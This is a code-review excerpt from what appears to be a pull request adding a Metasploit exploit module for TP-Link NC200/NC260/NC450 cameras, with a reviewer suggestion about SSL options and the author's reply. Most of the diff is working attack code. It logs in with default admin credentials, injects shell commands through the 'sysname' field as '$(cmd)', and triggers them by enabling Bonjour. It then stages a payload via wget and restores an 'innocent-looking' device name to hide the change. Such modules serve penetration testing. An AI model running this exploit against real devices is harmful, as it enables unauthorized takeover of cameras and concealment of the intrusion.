modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb

```diff
@@ -0,0 +1,160 @@
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => [ 'wget' ]
+            }
+          ]
+        ],
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'The web interface username', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The web interface password for the specified username', 'admin' ]),
+      ]
+    )
+  end
+
+  def login
+    user = datastore['USERNAME']
+    pass = Base64.strict_encode64(datastore['PASSWORD'])
+    if target.name == 'TP-Link NC260, NC450'
+      pass = Rex::Text.md5(pass)
+    end
+
+    print_status("Authenticating with #{user}:#{pass} ...")
+    begin
+      res = send_request_cgi({
+        'uri' => '/login.fcgi',
+        'method' => 'POST',
+        'vars_post' => {
+          'Username' => user,
+          'Password' => pass
+        }
+      })
+      if res.nil? || res.code == 404
+        fail_with(Failure::NoAccess, '/login.fcgi did not reply correctly. Wrong target ip?')
+      end
+      if res.body =~ /\"errorCode\"\:0/ && res.headers.key?('Set-Cookie') && res.body =~ /token/
+        print_good("Logged-in as #{user}")
+        @cookie = res.get_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/)[0][1]
+        print_good("Got cookie: #{@cookie}")
+        @token = res.body.scan(/"(token)":"([^,"]*)"/)[0][1]
+        print_good("Got token: #{@token}")
+      else
+        fail_with(Failure::NoAccess, "Login failed with #{user}:#{pass}")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+  end
+
+  def enable_bonjour
+    res = send_request_cgi({
+      'uri' => '/setbonjoursetting.fcgi',
+      'method' => 'POST',
+      'encode_params' => false,
+      'cookie' => "sess=#{@cookie}",
+      'vars_post' => {
+        'bonjourState' => '1',
+        'token' => @token.to_s
+      }
+    })
+    return res
+  rescue ::Rex::ConnectionError
+    vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
+    return nil
+  end
+
+  def sys_name(cmd)
+    res = send_request_cgi({
+      'uri' => '/setsysname.fcgi',
+      'method' => 'POST',
+      'encode_params' => true,
+      'cookie' => "sess=#{@cookie}",
+      'vars_post' => {
+        'sysname' => cmd,
+        'token' => @token.to_s
+      }
+    })
+    return res
+  rescue ::Rex::ConnectionError
+    vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
+    return nil
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status("Executing command: #{cmd}")
+    sys_name("$(#{cmd})")
+    enable_bonjour
+  end
+
+  def exploit
+    if target.name == 'TP-Link NC260, NC450'
+      datastore['SSL'] = true
+    else
+      datastore['SSL'] = false
+    end
+
+    login # Get cookie and csrf token
+    execute_cmdstager # Upload and execute payload
+    sys_name('NC200') # Set back an innocent-looking device name
+  end
```

Comment:
Instead of setting datastore options within the module, you can set the `SSL` option within the specific target via `DefaultOptions`.

```suggestion
  def exploit
    login # Get cookie and csrf token
    execute_cmdstager # Upload and execute payload
    sys_name('NC200') # Set back an innocent-looking device name
  end
```

Reply:
OK, I like it. I'll add this in a new commit since I have just modified the exploit method.